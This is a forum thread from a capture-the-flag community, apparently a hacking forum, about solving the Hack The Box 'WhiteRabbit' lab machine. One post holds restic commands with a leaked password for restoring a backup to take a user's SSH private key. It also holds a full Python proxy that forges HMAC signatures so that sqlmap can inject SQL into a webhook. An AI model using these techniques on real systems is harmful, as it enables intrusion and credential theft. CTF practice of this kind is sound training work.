04-06-2025, 11:17 PM
(04-06-2025, 03:41 PM)Lemon8767 Wrote: Is this the write up?
https://thecybersecguru.com/ctf-walkthro...ackthebox/
This site is full of AI-generated bullcrap
|
WhiteRabbit Hack the Box Season 7 (Linux Insane)
by RedBlock - Saturday April 5, 2025 at 05:26 PM
|
|
04-06-2025, 11:17 PM
(04-06-2025, 03:41 PM)Lemon8767 Wrote: Is this the write up? This site is full of AI-generated bullcrap
04-06-2025, 11:52 PM
04-07-2025, 12:20 AM
04-07-2025, 01:06 AM
(This post was last modified: 04-07-2025, 01:22 AM by bl4cksku11.)
Once you dump the correct database, you'll be able to see some restic credentials, what you can do is to restore the data in order to exfiltrate bob's ssh private key:
❯ echo ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw > .restic_passwd
❯ chmod 600 .restic_passwd
❯ export RESTIC_REPOSITORY="rest:http://75951e6ff.whiterabbit.htb"
❯ export RESTIC_PASSWORD_FILE=".restic_passwd"
❯ restic snapshots
repository 5b26a938 opened (version 2, compression level auto)
created new cache in /home/redacted/.cache/restic
ID Time Host Tags Paths
------------------------------------------------------------------------
272cacd5 2025-03-06 19:18:40 whiterabbit [color=#4cea5e]/dev/shm/bob/ssh[/color]
------------------------------------------------------------------------
1 snapshots
❯ restic restore latest --target ./restored_data![]() For the SQL Injection: Every time you wanna send a request to the webhook, you'll need first to calculate the signature header, otherwise, the request wil be invalid. I've created a python proxy to send all sqlmap tool requests through this proxy, so the proxy will calculate the payload's signature and them forward the request to the webhook: from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse
import requests
import hmac
import hashlib
# Configuration
TARGET_HOST = "28efa8f7df.whiterabbit.htb"
TARGET_URL = f"http://{TARGET_HOST}"
HMAC_KEY = b"3CWVGMndgMvdVAzOjqBiTicmv7gxc6IS"
class GoPhishProxy(BaseHTTPRequestHandler):
def do_POST(self):
# Read the request body
content_len = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_len)
# Clean the path from possible full URLs or malformed inputs
clean_path = urlparse(self.path).path
full_url = f"{TARGET_URL}{clean_path}"
# Calculate HMAC-SHA256 signature
signature = hmac.new(HMAC_KEY, body, hashlib.sha256).hexdigest()
# Prepare headers for forwarding
forward_headers = {key: self.headers[key] for key in self.headers if key.lower() != 'host'}
forward_headers['Host'] = TARGET_HOST
forward_headers['x-gophish-signature'] = f"sha256={signature}"
# Forward the request to the actual server
try:
response = requests.post(
full_url,
headers=forward_headers,
data=body,
allow_redirects=False,
verify=False
)
except Exception as e:
self.send_error(502, f"Proxy forwarding failed: {str(e)}")
return
# Respond back to sqlmap
self.send_response(response.status_code)
for k, v in response.headers.items():
if k.lower() != 'content-encoding':
self.send_header(k, v)
self.end_headers()
self.wfile.write(response.content)
# Debug log
print(f"[+] Forwarded to: {full_url}")
print(f" Signature: sha256={signature}")
print(f" Payload: {body.decode(errors='ignore')[:200]}")
if __name__ == "__main__":
print("
GoPhish SQLmap Proxy running on http://127.0.0.1:8000")
server = HTTPServer(('0.0.0.0', 8000), GoPhishProxy)
server.serve_forever()While the proxy is up and running, on another terminal, you can run SQLmap: sqlmap -r sqlmap.req --proxy=http://127.0.0.1:8000 --batch --level=5 --risk=3 --threads=5POST /webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d HTTP/1.1
Host: 28efa8f7df.whiterabbit.htb
Content-Type: application/json
User-Agent: sqlmap
Accept: */*
{"campaign_id":1,"email":"*","message":"Clicked Link"}
04-07-2025, 01:38 AM
(04-07-2025, 01:06 AM)bl4cksku11 Wrote: Once you dump the correct database, you'll be able to see some restic credentials, what you can do is to restore the data in order to exfiltrate bob's ssh private key: Well done.......
04-07-2025, 08:34 AM
(04-06-2025, 04:32 PM)bkbk Wrote:this works! what is the next step?(04-06-2025, 03:59 PM)EjoPlemavnE Wrote: So no one pays 8 credits for nothing
04-07-2025, 10:13 AM
i m bad in hack the box understanding, can anyone tell whats this related to and how can i learn from it as i left htb a long ago
04-07-2025, 10:56 AM
anyone with a good writeup based on the high level post commented earlier ? i didnt understand this part : "wikijs details a gophish webhook site on 28efa8f7df.whiterabbit.htb" how does that help for next steps
Ban reason: Reposting hidden content for free (Permanent)
04-07-2025, 11:09 AM
I'm stuck with `neo-password-generator`, i don't understand what i need to do here for get neo password.
04-07-2025, 12:46 PM
Okay so I got the file bob.7z. But I am failing retrieving the password for it. Made a pass generator once got a "successful" password that gave an error wrong password. Can someone help with that?
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 22 | 3,946 |
06-25-2026, 02:15 PM Last Post: |
||
| HTB Eloquia User and Root Flags - Insane Box | 13 | 2,236 |
03-27-2026, 06:14 PM Last Post: |
||
| HTB - ARTIFICIAL.HTB - EASY LINUX | 0 | 1,902 |
02-10-2026, 02:12 PM Last Post: |
||
| HTB - CONVERSOR.HTB - EASY LINUX | 0 | 824 |
02-09-2026, 04:36 PM Last Post: |
||
| HTB - FACTS.HTB - EASY LINUX | 2 | 869 |
02-09-2026, 11:02 AM Last Post: |
||